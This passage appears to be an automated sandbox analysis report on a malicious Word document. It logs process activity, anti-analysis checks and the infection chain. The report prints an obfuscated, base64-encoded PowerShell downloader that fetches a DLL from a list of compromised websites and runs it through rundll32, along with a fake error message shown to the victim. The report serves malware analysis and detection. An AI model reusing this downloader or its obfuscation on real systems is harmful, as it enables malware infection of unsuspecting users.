                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2560Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0022109C FindFirstFileW,14_2_0022109C
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                      Source: powershell.exe, 00000005.00000002.2104363576.0000000000294000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                      Source: rundll32.exe, 00000007.00000002.2107524438.000000000069D000.00000004.00000020.sdmpBinary or memory string: PPTP00VMware_S
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100011C0 Control_RunDLL,VirtualAlloc,VirtualAlloc,GetModuleHandleExA,VirtualAlloc,GetProcAddress,GetProcAddress,VirtualAlloc,GetProcAddress,LdrFindResource_U,LdrAccessResource,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,VirtualAlloc,_memmove,CryptEncrypt,7_2_100011C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,7_2_1000C620
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,7_2_1000C620
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,7_2_1000C620
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023C4FF mov eax, dword ptr fs:[00000030h]7_2_0023C4FF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001EC4FF mov eax, dword ptr fs:[00000030h]8_2_001EC4FF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001DC4FF mov eax, dword ptr fs:[00000030h]9_2_001DC4FF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0027C4FF mov eax, dword ptr fs:[00000030h]10_2_0027C4FF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001AC4FF mov eax, dword ptr fs:[00000030h]11_2_001AC4FF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006CC4FF mov eax, dword ptr fs:[00000030h]12_2_006CC4FF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001EC4FF mov eax, dword ptr fs:[00000030h]13_2_001EC4FF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0022C4FF mov eax, dword ptr fs:[00000030h]14_2_0022C4FF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10001B30 SetLastError,SetLastError,VirtualAlloc,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,7_2_10001B30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10007F07 SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_10007F07

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 5.2.136.90 80Jump to behavior
                      Encrypted powershell cmdline option foundShow sources
                      Source: unknownProcess created: Base64 decoded sV ("K"+"47d") ([tYPe]("{4}{1}{0}{3}{2}"-F's','y','ecTorY','TEm.Io.DIr','s')) ; $Wi8 =[tyPe]("{2}{3}{7}{1}{4}{6}{5}{8}{0}"-F 'gER','.Net.SERV','SYs','Te','I','tmA','CePOIN','m','Na') ; $ErrorActionPreference = (('Silent'+'ly')+'C'+('on'+'ti')+'n'+'ue');$Ol9onki=$C02W + [char](64) + $A03P;$H27X=('I'+('6'+'7Q')); (gi ("VaR"+"iABLe:k"+"47d") ).vaLue::"CrE`A`T`EDIReCT`ORy"($HOME + (('{'+'0'+'}Ns'+'p'+'zvsg{'+'0}'+'Sj_dwgs{'+'0}') -f [CHAR]92));$T48K=('H'+('61'+'D')); $Wi8::"secuRit`yprO`T`ocoL" = (('Tl'+'s')+'12');$C59M=(('M'+'24')+'P');$Xmmhked = (('R'+'31')+'N');$A69I=(('P_'+'6')+'B');$Q2yg9g_=$HOME+((('1'+'wr')+('Ns'+'pz')+('v'+'sg')+'1w'+('rS'+'j_'+'dw'+'gs1wr'))."rEp`lAce"(([Char]49+[Char]119+[Char]114),'\'))+$Xmmhked+(('.d'+'l')+'l');$U39R=('M0'+'1P');$Qcech4h=(']a'+('n'+'w[3://')+('w'+'ps')+'a'+'pk'+('.co'+'m/wp-'+'ad'+'mi')+('n/v'+'/@')+']'+('anw'+'[3'+'://s')+('ofsu'+'i')+'te'+('.c'+'o')+'m/'+'wp'+('-i'+'nc')+('lud'+'e')+'s/'+('2jm3n'+'Ik/'+'@')+(']a'+'nw[')+'3'+('://veter'+'inaria'+'d')+('rp'+'op')+('ui.co'+'m')+('/'+'co')+'n'+'te'+('nt'+'/5f')+'1'+'8Q'+'/'+'@'+(']a'+'n')+'w'+('[3:'+'//sh'+'op'+'.')+'el'+'e'+('men'+'sl'+'i')+('d'+'e.')+('com'+'/')+'wp'+'-c'+'o'+('n'+'tent')+('/'+'n/'+'@]an')+('w[3'+'://')+'k'+('h'+'an')+('h'+'ho')+('aho'+'m')+('nay.ne'+'t/'+'wordp')+('re'+'s')+('s/'+'C')+('GMC/@'+']')+'an'+'w'+('[3:/'+'/')+('ca'+'m')+('pu'+'se'+'xpo'+'.org/de')+'p'+('ar'+'tmen')+'t'+('-'+'of-odhm')+('mkd/95eX'+'Z'+'Y')+('/@]anw['+'3s://g'+'ur'+'zta'+'c
                      Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded sV ("K"+"47d") ([tYPe]("{4}{1}{0}{3}{2}"-F's','y','ecTorY','TEm.Io.DIr','s')) ; $Wi8 =[tyPe]("{2}{3}{7}{1}{4}{6}{5}{8}{0}"-F 'gER','.Net.SERV','SYs','Te','I','tmA','CePOIN','m','Na') ; $ErrorActionPreference = (('Silent'+'ly')+'C'+('on'+'ti')+'n'+'ue');$Ol9onki=$C02W + [char](64) + $A03P;$H27X=('I'+('6'+'7Q')); (gi ("VaR"+"iABLe:k"+"47d") ).vaLue::"CrE`A`T`EDIReCT`ORy"($HOME + (('{'+'0'+'}Ns'+'p'+'zvsg{'+'0}'+'Sj_dwgs{'+'0}') -f [CHAR]92));$T48K=('H'+('61'+'D')); $Wi8::"secuRit`yprO`T`ocoL" = (('Tl'+'s')+'12');$C59M=(('M'+'24')+'P');$Xmmhked = (('R'+'31')+'N');$A69I=(('P_'+'6')+'B');$Q2yg9g_=$HOME+((('1'+'wr')+('Ns'+'pz')+('v'+'sg')+'1w'+('rS'+'j_'+'dw'+'gs1wr'))."rEp`lAce"(([Char]49+[Char]119+[Char]114),'\'))+$Xmmhked+(('.d'+'l')+'l');$U39R=('M0'+'1P');$Qcech4h=(']a'+('n'+'w[3://')+('w'+'ps')+'a'+'pk'+('.co'+'m/wp-'+'ad'+'mi')+('n/v'+'/@')+']'+('anw'+'[3'+'://s')+('ofsu'+'i')+'te'+('.c'+'o')+'m/'+'wp'+('-i'+'nc')+('lud'+'e')+'s/'+('2jm3n'+'Ik/'+'@')+(']a'+'nw[')+'3'+('://veter'+'inaria'+'d')+('rp'+'op')+('ui.co'+'m')+('/'+'co')+'n'+'te'+('nt'+'/5f')+'1'+'8Q'+'/'+'@'+(']a'+'n')+'w'+('[3:'+'//sh'+'op'+'.')+'el'+'e'+('men'+'sl'+'i')+('d'+'e.')+('com'+'/')+'wp'+'-c'+'o'+('n'+'tent')+('/'+'n/'+'@]an')+('w[3'+'://')+'k'+('h'+'an')+('h'+'ho')+('aho'+'m')+('nay.ne'+'t/'+'wordp')+('re'+'s')+('s/'+'C')+('GMC/@'+']')+'an'+'w'+('[3:/'+'/')+('ca'+'m')+('pu'+'se'+'xpo'+'.org/de')+'p'+('ar'+'tmen')+'t'+('-'+'of-odhm')+('mkd/95eX'+'Z'+'Y')+('/@]anw['+'3s://g'+'ur'+'zta'+'cJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAKJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLLJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLLJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Czsbnlmzhou\heljhxhmap.nib',Control_RunDLLJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Tshsltpdkbydgac\umncisajimhcut.zje',Control_RunDLLJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Nrnhwjwgkqopncg\hahzpwlqhuedal.zvs',Control_RunDLLJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wcuhm\nost.bdw',Control_RunDLLJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Omzikkfxzmn\texvcnoeud.iob',Control_RunDLLJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Afhsry\advki.tth',Control_RunDLLJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Tjgkecgvqxx\dxuouhyssc.uio',Control_RunDLLJump to behavior
